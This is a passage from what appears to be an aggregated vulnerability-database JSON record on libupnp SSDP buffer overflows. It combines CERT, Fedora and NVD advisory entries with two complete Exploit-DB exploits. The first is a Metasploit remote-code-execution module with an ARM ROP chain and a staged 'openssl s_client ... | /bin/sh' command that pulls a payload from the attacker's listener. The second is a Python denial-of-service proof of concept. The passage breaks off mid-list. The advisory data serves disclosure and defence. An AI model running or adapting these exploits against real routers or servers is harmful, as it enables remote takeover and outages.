Public:** | 2013-01-29 \n**Date First Published:** | 2013-01-29 \n**Date Last Updated: ** | 2014-07-30 19:13 UTC \n**Document Revision: ** | 69 \n", "modified": "2014-07-30T19:13:00", "published": "2013-01-29T00:00:00", "id": "VU:922681", "href": "https://www.kb.cert.org/vuls/id/922681", "type": "cert", "title": "Portable SDK for UPnP Devices (libupnp) contains multiple buffer overflows in SSDP", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-5958", "CVE-2012-5959", "CVE-2012-5960", "CVE-2012-5962", "CVE-2012-5963", "CVE-2012-5964", "CVE-2012-5965"], "description": "MediaTomb is an open source (GPL) UPnP MediaServer with a nice web user interface, it allows you to stream your digital media through your home network and listen to/watch it on a variety of UPnP compatible devices. MediaTomb implements the UPnP MediaServer V 1.0 specification that can be found on http://www.upnp.org/. ", "modified": "2013-02-21T05:48:15", "published": "2013-02-21T05:48:15", "id": "FEDORA:7AED420F62", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: mediatomb-0.12.1-23.fc17", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-5958", "CVE-2012-5959", "CVE-2012-5960", "CVE-2012-5962", "CVE-2012-5963", "CVE-2012-5964", "CVE-2012-5965"], "description": "The Universal Plug and Play (UPnP) SDK for Linux provides support for building UPnP-compliant control points, devices, and bridges on Linux. ", "modified": "2013-02-12T05:32:58", "published": "2013-02-12T05:32:58", "id": "FEDORA:4299220A19", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: libupnp-1.6.18-1.fc18", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-5958", "CVE-2012-5959", "CVE-2012-5960", "CVE-2012-5962", "CVE-2012-5963", "CVE-2012-5964", "CVE-2012-5965"], "description": "The Universal Plug and Play (UPnP) SDK for Linux provides support for building UPnP-compliant control points, devices, and bridges on Linux. ", "modified": "2013-02-12T05:34:07", "published": "2013-02-12T05:34:07", "id": "FEDORA:8CF1320B49", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: libupnp-1.6.18-1.fc16", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-5958", "CVE-2012-5959", "CVE-2012-5960", "CVE-2012-5962", "CVE-2012-5963", "CVE-2012-5964", "CVE-2012-5965"], "description": "MediaTomb is an open source (GPL) UPnP MediaServer with a nice web user interface, it allows you to stream your digital media through your home network and listen to/watch it on a variety of UPnP compatible devices. MediaTomb implements the UPnP MediaServer V 1.0 specification that can be found on http://www.upnp.org/. ", "modified": "2013-02-21T05:32:14", "published": "2013-02-21T05:32:14", "id": "FEDORA:4ECCF20F1C", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: mediatomb-0.12.1-23.fc18", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-5958", "CVE-2012-5959", "CVE-2012-5960", "CVE-2012-5962", "CVE-2012-5963", "CVE-2012-5964", "CVE-2012-5965"], "description": "The Universal Plug and Play (UPnP) SDK for Linux provides support for building UPnP-compliant control points, devices, and bridges on Linux. ", "modified": "2013-02-12T05:10:57", "published": "2013-02-12T05:10:57", "id": "FEDORA:02152208BF", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: libupnp-1.6.18-1.fc17", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-02T23:20:35", "description": "Portable UPnP SDK unique_service_name() Remote Code Execution. CVE-2012-5858,CVE-2012-5958,CVE-2012-5959,CVE-2012-5960,CVE-2012-5961,CVE-2012-5962,CVE-2012-5...", "published": "2013-02-05T00:00:00", "type": "exploitdb", "title": "Portable UPnP SDK unique_service_name Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-5961", "CVE-2012-5858", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "modified": "2013-02-05T00:00:00", "id": "EDB-ID:24455", "href": "https://www.exploit-db.com/exploits/24455/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Portable UPnP SDK unique_service_name() Remote Code Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a buffer overflow in the unique_service_name()\r\n\t\t\t\tfunction of libupnp's SSDP processor. The libupnp library is used across\r\n\t\t\t\tthousands of devices and is referred to as the Intel SDK for UPnP\r\n\t\t\t\tDevices or the Portable SDK for UPnP Devices.\r\n\r\n\t\t\t\tDue to size limitations on many devices, this exploit uses a separate TCP\r\n\t\t\t\tlistener to stage the real payload.\r\n\t\t\t},\r\n\t\t\t'Author' => [\r\n\t\t\t\t\t'hdm', # Exploit dev for Supermicro IPMI\r\n\t\t\t\t\t'Alex Eubanks <endeavor[at]rainbowsandpwnies.com>', # Exploit dev for Supermicro IPMI\r\n\t\t\t\t\t'Richard Harman <richard[at]richardharman.com>' # Binaries, system info, testing for Supermicro IPMI\r\n\t\t\t\t],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2012-5858' ],\r\n\t\t\t\t\t[ 'US-CERT-VU', '922681' ],\r\n\t\t\t\t\t[ 'URL', 'https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play' ]\r\n\t\t\t\t],\r\n\t\t\t'Platform' => ['unix'],\r\n\t\t\t'Arch' => ARCH_CMD,\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n#\r\n#\t\t\t\t\t# The following BadChars do not apply since we stage the payload\r\n#\t\t\t\t\t# through a secondary connection. This is just for reference.\r\n#\r\n#\t\t\t\t\t'BadChars' =>\r\n#\t\t\t\t\t\t# Bytes 0-8 are not allowed\r\n#\t\t\t\t\t\t[*(0..8)].pack(\"C*\") +\r\n#\t\t\t\t\t\t# 0x09, 0x0a, 0x0d are allowed\r\n#\t\t\t\t\t\t\"\\x0b\\x0c\\x0e\\x0f\" +\r\n#\t\t\t\t\t\t# All remaining bytes up to space are restricted\r\n#\t\t\t\t\t\t[*(0x10..0x1f)].pack(\"C*\") +\r\n#\t\t\t\t\t\t# Also not allowed\r\n#\t\t\t\t\t\t\"\\x7f\\x3a\" +\r\n#\t\t\t\t\t\t# Breaks our string quoting\r\n#\t\t\t\t\t\t\"\\x22\",\r\n\r\n\t\t\t\t\t# Unlimited since we stage this over a secondary connection\r\n\t\t\t\t\t'Space' => 8000,\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'Compat' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'PayloadType' => 'cmd',\r\n\t\t\t\t\t\t\t# specific payloads vary widely by device (openssl for IPMI, etc)\r\n\t\t\t\t\t\t}\r\n\t\t\t\t},\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\r\n\t\t\t\t\t[ \"Automatic\", { } ],\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# ROP targets are difficult to represent in the hash, use callbacks instead\r\n\t\t\t\t\t#\r\n\t\t\t\t\t[ \"Supermicro Onboard IPMI (X9SCL/X9SCM) Intel SDK 1.3.1\", {\r\n\r\n\t\t\t\t\t\t# The callback handles all target-specific settings\r\n\t\t\t\t\t\t:callback => :target_supermicro_ipmi_131,\r\n\r\n\t\t\t\t\t\t# This matches any line of the SSDP M-SEARCH response\r\n\t\t\t\t\t\t:fingerprint =>\r\n\t\t\t\t\t\t\t/Server:\\s*Linux\\/2\\.6\\.17\\.WB_WPCM450\\.1\\.3 UPnP\\/1\\.0, Intel SDK for UPnP devices\\/1\\.3\\.1/mi\r\n\r\n\t\t\t\t\t\t#\r\n\t\t\t\t\t\t# SSDP response:\r\n\t\t\t\t\t\t#\tLinux/2.6.17.WB_WPCM450.1.3 UPnP/1.0, Intel SDK for UPnP devices/1.3.1\r\n\t\t\t\t\t\t#\thttp://192.168.xx.xx:49152/IPMIdevicedesc.xml\r\n\t\t\t\t\t\t#\tuuid:Upnp-IPMI-1_0-1234567890001::upnp:rootdevice\r\n\r\n\t\t\t\t\t\t# Approximately 35,000 of these found in the wild via critical.io scans (2013-02-03)\r\n\r\n\t\t\t\t\t} ],\r\n\r\n\t\t\t\t\t[ \"Debug Target\", {\r\n\r\n\t\t\t\t\t\t# The callback handles all target-specific settings\r\n\t\t\t\t\t\t:callback => :target_debug\r\n\r\n\t\t\t\t\t} ]\r\n\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Jan 29 2013'))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RHOST(),\r\n\t\t\t\tOpt::RPORT(1900),\r\n\t\t\t\tOptAddress.new('CBHOST', [ false, \"The listener address used for staging the real payload\" ]),\r\n\t\t\t\tOptPort.new('CBPORT', [ false, \"The listener port used for staging the real payload\" ])\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\r\n\tdef exploit\r\n\r\n\t\tconfigure_socket\r\n\r\n\t\ttarget_info = choose_target\r\n\r\n\t\tunless self.respond_to?(target_info[:callback])\r\n\t\t\tprint_error(\"Invalid target specified: no callback function defined\")\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tbuffer = self.send(target_info[:callback])\r\n\t\tpkt =\r\n\t\t\t\"M-SEARCH * HTTP/1.1\\r\\n\" +\r\n\t\t\t\"Host:239.255.255.250:1900\\r\\n\" +\r\n\t\t\t\"ST:uuid:schemas:device:\" + buffer + \":end\\r\\n\" +\r\n\t\t\t\"Man:\\\"ssdp:discover\\\"\\r\\n\" +\r\n\t\t\t\"MX:3\\r\\n\\r\\n\"\r\n\r\n\t\tprint_status(\"Exploiting #{rhost} with target '#{target_info.name}' with #{pkt.length} bytes to port #{rport}...\")\r\n\r\n\t\tr = udp_sock.sendto(pkt, rhost, rport, 0)\r\n\r\n\t\t1.upto(5) do\r\n\t\t\t::IO.select(nil, nil, nil, 1)\r\n\t\t\tbreak if session_created?\r\n\t\tend\r\n\r\n\t\t# No handler() support right now\r\n\tend\r\n\r\n\r\n\r\n\t# These devices are armle, run version 1.3.1 of libupnp, have random stacks, but no PIE on libc\r\n\tdef target_supermicro_ipmi_131\r\n\r\n\t\t# Create a fixed-size buffer for the payload\r\n\t\tbuffer = Rex::Text.rand_text_alpha(2000)\r\n\r\n\t\t# Place the entire buffer inside of double-quotes to take advantage of is_qdtext_char()\r\n\t\tbuffer[0,1] = '\"'\r\n\t\tbuffer[1999,1] = '\"'\r\n\r\n\t\t# Prefer CBHOST, but use LHOST, or autodetect the IP otherwise\r\n\t\tcbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST'])\r\n\r\n\t\t# Start a listener\r\n\t\tstart_listener(true)\r\n\r\n\t\t# Figure out the port we picked\r\n\t\tcbport = self.service.getsockname[2]\r\n\r\n\t\t# Restart the service and use openssl to stage the real payload\r\n\t\t# Staged because only ~150 bytes of contiguous data are available before mangling\r\n\t\tcmd = \"sleep 1;/bin/upnp_dev & echo; openssl s_client -quiet -host #{cbhost} -port #{cbport}|/bin/sh;exit;#\"\r\n\t\tbuffer[432, cmd.length] = cmd\r\n\r\n\t\t# Adjust $r3 to point from the bottom of the stack back into our buffer\r\n\t\tbuffer[304,4] = [0x4009daf8].pack(\"V\") #\r\n\t\t\t# 0x4009daf8:\tadd\tr3, r3, r4, lsl #2\r\n\t\t\t# 0x4009dafc:\tldr\tr0, [r3, #512]\t; 0x200\r\n\t\t\t# 0x4009db00:\tpop\t{r4, r10, pc}\r\n\r\n\t\t# The offset (right-shifted by 2 ) to our command string above\r\n\t\tbuffer[284,4] = [0xfffffe78].pack(\"V\") #\r\n\r\n\t\t# Copy $r3 into $r0\r\n\t\tbuffer[316,4] = [0x400db0ac].pack(\"V\")\r\n\t\t\t# 0x400db0ac <_IO_wfile_underflow+1184>:\tsub\tr0, r3, #1\r\n\t\t\t# 0x400db0b0 <_IO_wfile_underflow+1188>:\tpop\t{pc}\t\t; (ldr pc, [sp], #4)\r\n\r\n\t\t# Move our stack pointer down so as not to corrupt our payload\r\n\t\tbuffer[320,4] = [0x400a5568].pack(\"V\")\r\n\t\t\t# 0x400a5568 <__default_rt_sa_restorer_v2+5448>:\tadd\tsp, sp, #408\t; 0x198\r\n\t\t\t# 0x400a556c <__default_rt_sa_restorer_v2+5452>:\tpop\t{r4, r5, pc}\r\n\r\n\t\t# Finally return to system() with $r0 pointing to our string\r\n\t\tbuffer[141,4] = [0x400add8c].pack(\"V\")\r\n\r\n\t\treturn buffer\r\n=begin\r\n\t\t00008000-00029000 r-xp 00000000 08:01 709233 /bin/upnp_dev\r\n\t\t00031000-00032000 rwxp 00021000 08:01 709233 /bin/upnp_dev\r\n\t\t00032000-00055000 rwxp 00000000 00:00 0 [heap]\r\n\t\t40000000-40015000 r-xp 00000000 08:01 709562 /lib/ld-2.3.5.so\r\n\t\t40015000-40017000 rwxp 00000000 00:00 0\r\n\t\t4001c000-4001d000 r-xp 00014000 08:01 709562 /lib/ld-2.3.5.so\r\n\t\t4001d000-4001e000 rwxp 00015000 08:01 709562 /lib/ld-2.3.5.so\r\n\t\t4001e000-4002d000 r-xp 00000000 08:01 709535 /lib/libpthread-0.10.so\r\n\t\t4002d000-40034000 ---p 0000f000 08:01 709535 /lib/libpthread-0.10.so\r\n\t\t40034000-40035000 r-xp 0000e000 08:01 709535 /lib/libpthread-0.10.so\r\n\t\t40035000-40036000 rwxp 0000f000 08:01 709535 /lib/libpthread-0.10.so\r\n\t\t40036000-40078000 rwxp 00000000 00:00 0\r\n\t\t40078000-40180000 r-xp 00000000 08:01 709620 /lib/libc-2.3.5.so\r\n\t\t40180000-40182000 r-xp 00108000 08:01 709620 /lib/libc-2.3.5.so\r\n\t\t40182000-40185000 rwxp 0010a000 08:01 709620 /lib/libc-2.3.5.so\r\n\t\t40185000-40187000 rwxp 00000000 00:00 0\r\n\t\tbd600000-bd601000 ---p 00000000 00:00 0\r\n\t\tbd601000-bd800000 rwxp 00000000 00:00 0\r\n\t\tbd800000-bd801000 ---p 00000000 00:00 0\r\n\t\tbd801000-bda00000 rwxp 00000000 00:00 0\r\n\t\tbdc00000-bdc01000 ---p 00000000 00:00 0\r\n\t\tbdc01000-bde00000 rwxp 00000000 00:00 0\r\n\t\tbe000000-be001000 ---p 00000000 00:00 0\r\n\t\tbe001000-be200000 rwxp 00000000 00:00 0\r\n\t\tbe941000-be956000 rwxp 00000000 00:00 0 [stack]\r\n=end\r\n\r\n\tend\r\n\r\n\t# Generate a buffer that provides a starting point for exploit development\r\n\tdef target_debug\r\n\t\tbuffer = Rex::Text.pattern_create(2000)\r\n\tend\r\n\r\n\tdef stage_real_payload(cli)\r\n\t\tprint_good(\"Sending payload of #{payload.encoded.length} bytes to #{cli.peerhost}:#{cli.peerport}...\")\r\n\t\tcli.put(payload.encoded + \"\\n\")\r\n\tend\r\n\r\n\tdef start_listener(ssl = false)\r\n\r\n\t\tcomm = datastore['ListenerComm']\r\n\t\tif comm == \"local\"\r\n\t\t\tcomm = ::Rex::Socket::Comm::Local\r\n\t\telse\r\n\t\t\tcomm = nil\r\n\t\tend\r\n\r\n\t\tself.service = Rex::Socket::TcpServer.create(\r\n\t\t\t'LocalPort' => datastore['CBPORT'],\r\n\t\t\t'SSL' => ssl,\r\n\t\t\t'SSLCert' => datastore['SSLCert'],\r\n\t\t\t'Comm' => comm,\r\n\t\t\t'Context' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Msf' => framework,\r\n\t\t\t\t\t'MsfExploit' => self,\r\n\t\t\t\t})\r\n\r\n\t\tself.service.on_client_connect_proc = Proc.new { |client|\r\n\t\t\tstage_real_payload(client)\r\n\t\t}\r\n\r\n\t\t# Start the listening service\r\n\t\tself.service.start\r\n\tend\r\n\r\n\t#\r\n\t# Shut down any running services\r\n\t#\r\n\tdef cleanup\r\n\t\tsuper\r\n\t\tif self.service\r\n\t\t\tprint_status(\"Shutting down payload stager listener...\")\r\n\t\t\tbegin\r\n\t\t\t\tself.service.deref if self.service.kind_of?(Rex::Service)\r\n\t\t\t\tif self.service.kind_of?(Rex::Socket)\r\n\t\t\t\t\tself.service.close\r\n\t\t\t\t\tself.service.stop\r\n\t\t\t\tend\r\n\t\t\t\tself.service = nil\r\n\t\t\trescue ::Exception\r\n\t\t\tend\r\n\t\tend\r\n\tend\r\n\r\n\tdef choose_target\r\n\t\t# If the user specified a target, use that one\r\n\t\treturn self.target unless self.target.name =~ /Automatic/\r\n\r\n\t\tmsearch =\r\n\t\t\t\"M-SEARCH * HTTP/1.1\\r\\n\" +\r\n\t\t\t\"Host:239.255.255.250:1900\\r\\n\" +\r\n\t\t\t\"ST:upnp:rootdevice\\r\\n\" +\r\n\t\t\t\"Man:\\\"ssdp:discover\\\"\\r\\n\" +\r\n\t\t\t\"MX:3\\r\\n\\r\\n\"\r\n\r\n\t\t# Fingerprint the service through SSDP\r\n\t\tudp_sock.sendto(msearch, rhost, rport, 0)\r\n\r\n\t\tres = nil\r\n\t\t1.upto(5) do\r\n\t\t\tres,addr,info = udp_sock.recvfrom(65535, 1.0)\r\n\t\t\tbreak if res and res =~ /^(Server|Location)/mi\r\n\t\t\tudp_sock.sendto(msearch, rhost, rport, 0)\r\n\t\tend\r\n\r\n\t\tself.targets.each do |t|\r\n\t\t\treturn t if t[:fingerprint] and res =~ t[:fingerprint]\r\n\t\tend\r\n\r\n\t\tif res and res.to_s.length > 0\r\n\t\t\tprint_status(\"No target matches this fingerprint\")\r\n\t\t\tprint_status(\"\")\r\n\t\t\tres.to_s.split(\"\\n\").each do |line|\r\n\t\t\t\tprint_status(\" #{line.strip}\")\r\n\t\t\tend\r\n\t\t\tprint_status(\"\")\r\n\t\telse\r\n\t\t\tprint_status(\"The system #{rhost} did not reply to our M-SEARCH probe\")\r\n\t\tend\r\n\r\n\t\tfail_with(Exploit::Failure::NoTarget, \"No compatible target detected\")\r\n\tend\r\n\r\n\t# Accessor for our TCP payload stager\r\n\tattr_accessor :service\r\n\r\n\t# We need an unconnected socket because SSDP replies often come\r\n\t# from a different sent port than the one we sent to. This also\r\n\t# breaks the standard UDP mixin.\r\n\tdef configure_socket\r\n\t\tself.udp_sock = Rex::Socket::Udp.create({\r\n\t\t\t'Context' => { 'Msf' => framework, 'MsfExploit' => self }\r\n\t\t})\r\n\t\tadd_socket(self.udp_sock)\r\n\tend\r\n\r\n\t#\r\n\t# Required since we aren't using the normal mixins\r\n\t#\r\n\r\n\tdef rhost\r\n\t\tdatastore['RHOST']\r\n\tend\r\n\r\n\tdef rport\r\n\t\tdatastore['RPORT']\r\n\tend\r\n\r\n\t# Accessor for our UDP socket\r\n\tattr_accessor :udp_sock\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/24455/"}, {"lastseen": "2020-11-27T12:43:16", "description": "", "published": "2020-11-27T00:00:00", "type": "exploitdb", "title": "libupnp 1.6.18 - Stack-based buffer overflow (DoS)", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-5958"], "modified": "2020-11-27T00:00:00", "id": "EDB-ID:49119", "href": "https://www.exploit-db.com/exploits/49119", "sourceData": "# Exploit Title: libupnp 1.6.18 - Stack-based buffer overflow (DoS)\r\n# Date: 2020-08-20\r\n# Exploit Author: Patrik Lantz\r\n# Vendor Homepage: https://pupnp.sourceforge.io/\r\n# Software Link: https://sourceforge.net/projects/pupnp/files/pupnp/libUPnP%201.6.6/libupnp-1.6.6.tar.bz2/download\r\n# Version: <= 1.6.6\r\n# Tested on: Linux\r\n# CVE : CVE-2012-5958\r\n\r\nimport socket\r\n\r\npayload = \"M-SEARCH * HTTP/1.1\\r\\nHOST: 239.255.255.250:1900\\r\\nST:uuid:schemas:device:\"\r\npayload += \"A\"*324 + \"BBBB\"\r\npayload += \":urn:\\r\\nMX:2\\r\\nMAN:\\\"ssdp:discover\\\"\\r\\n\\r\\n\"\r\n\r\nbyte_message = bytes(payload)\r\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\ns.sendto(byte_message, (\"239.255.255.250\", 1900))", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://www.exploit-db.com/download/49119"}], "cve": [{"lastseen": "2021-02-02T05:59:57", "description": "Stack-based buffer overflow in the unique_service_name function in ssdp/ssdp_server.c in the SSDP parser in the portable SDK for UPnP Devices (aka libupnp, formerly the Intel SDK for UPnP devices) 1.3.1 allows remote attackers to execute arbitrary code via a long UDN (aka device) field in a UDP packet.\nPer CERT's advisory additional products may be affected: http://www.kb.cert.org/vuls/id/922681 \"Hundreds of vendors have used the libupnp library in their products, many of which are acting as the home routers for consumer networks. Any application linking to libupnp is likely to be affected\"", "edition": 4, "cvss3": {}, "published": "2013-01-31T21:55:00", "title": "CVE-2012-5961", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5961"], "modified": "2015-09-02T16:29:00", "cpe": ["cpe:/a:libupnp_project:libupnp:1.3.1"], "id": "CVE-2012-5961", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5961", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:libupnp_project:libupnp:1.3.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:59:57", "description": "Stack-based buffer overflow in the unique_service_name function in ssdp/ssdp_server.c in the SSDP parser in the portable SDK for UPnP Devices (aka libupnp, formerly the Intel SDK for UPnP devices) 1.3.1 allows remote attackers to execute arbitrary code via a long UDN (aka uuid) field within a string that lacks a :: (colon colon) in a UDP packet.\nPer CERT's advisory additional products may be affected: http://www.kb.cert.org/vuls/id/922681 \"Hundreds of vendors have used the libupnp library in their products, many of which are acting as the home routers for consumer networks. Any application linking to libupnp is likely to be affected\"", "edition": 4, "cvss3": {}, "published": "2013-01-31T21:55:00", "title": "CVE-2012-5963", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5963"], "modified": "2015-09-01T17:06:00", "cpe": ["cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.3.1"], "id": "CVE-2012-5963", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5963", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.3.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:59:57", "description": "Stack-based buffer overflow in the unique_service_name function in ssdp/ssdp_server.c in the SSDP parser in the portable SDK for UPnP Devices (aka libupnp, formerly the Intel SDK for UPnP devices) 1.3.1 allows remote attackers to execute arbitrary code via a long DeviceType (aka urn device) field in a UDP packet.\nPer CERT's advisory additional products may be affected: http://www.kb.cert.org/vuls/id/922681 \"Hundreds of vendors have used the libupnp library in their products, many of which are acting as the home routers for consumer networks. Any application linking to libupnp is likely to be affected\"", "edition": 4, "cvss3": {}, "published": "2013-01-31T21:55:00", "title": "CVE-2012-5965", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5965"], "modified": "2015-09-01T17:08:00", "cpe": ["cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.3.1"], "id": "CVE-2012-5965", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5965", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.3.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:59:57", "description": "Stack-based buffer overflow in the unique_service_name function in ssdp/ssdp_server.c in the SSDP parser in the portable SDK for UPnP Devices (aka libupnp, formerly the Intel SDK for UPnP devices) before 1.6.18 allows remote attackers to execute arbitrary code via a long UDN (aka uuid) field within a string that contains a :: (colon colon) in a UDP packet.\nPer CERT's advisory additional products may be affected: http://www.kb.cert.org/vuls/id/922681 \"Hundreds of vendors have used the libupnp library in their products, many of which are acting as the home routers for consumer networks. Any application linking to libupnp is likely to be affected\"", "edition": 6, "cvss3": {}, "published": "2013-01-31T21:55:00", "title": "CVE-2012-5959", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5959"], "modified": "2017-11-03T01:29:00", "cpe": ["cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.17", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.1", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.5", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.12", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.4", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.7", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.9", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.2", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.16", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.13", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.5", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.0", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.2", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.7", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.4", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.6", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.8", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.10", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.15", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.0", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.1", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.3", 